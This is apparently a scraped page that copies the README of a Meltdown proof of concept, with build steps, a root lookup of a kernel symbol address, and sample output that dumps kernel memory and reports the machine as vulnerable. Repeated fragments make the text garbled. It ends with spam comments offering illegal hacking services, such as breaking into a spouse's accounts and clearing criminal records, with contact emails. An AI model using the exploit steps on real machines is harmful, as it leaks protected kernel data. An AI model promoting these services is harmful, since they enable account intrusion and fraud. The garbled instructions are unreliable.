Meltdown Exploit PoC
Speculative optimizations execute code in a non-secure manner leaving data traces in microarchitecture such as cache.
Refer to the paper by Lipp et. al 2017 for details: https://meltdownattack.com/meltdown.pdf.
Can only dump
linux_proc_banner
at the moment, since requires accessed memory to be in cache and linux_proc_banner
is cached on every read from /proc/version
. Might work with prefetch
.
Build with
make
, run with ./run.sh
.
Can't defeat KASLR yet, so you may need to enter your password to find
linux_proc_banner
in the /proc/kallsyms
(or do it manually).
Flush+Reload and target array approach taken from spectre paper https://spectreattack.com/spectre.pdf implemented following clues from https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
Pandora's box is open.
Result:
Does not work
If it compiles but fails with
$ make
cc -O2 -msse2 -c -o meltdown.o meltdown.c
cc meltdown.o -o meltdown
$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk
/linux_proc_banner/ {
if (strtonum("0x"$1))
print $1;
exit 0;
} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 158
model name : Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping : 9
microcode : 0x5e
cpu MHz : 3499.316
cache size : 6144 KB
physical id : 0
Does not work
If it compiles but fails with
Illegal instruction
then either your hardware is very old or it is a VM. Try compiling with:
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com
Special thanks to (hackingsetting50@gmail.com) for exposing my cheating husband. Right with me i got a lot of evidences and proofs that shows that my husband is a fuck boy and as well a cheater ranging from his text messages, call logs, whats-app messages, deleted messages and many more, All thanks to
ReplyDelete(hackingsetting50@gmail.com), if not for him i will never know what has been going on for a long time.
Contact him now and thank me later.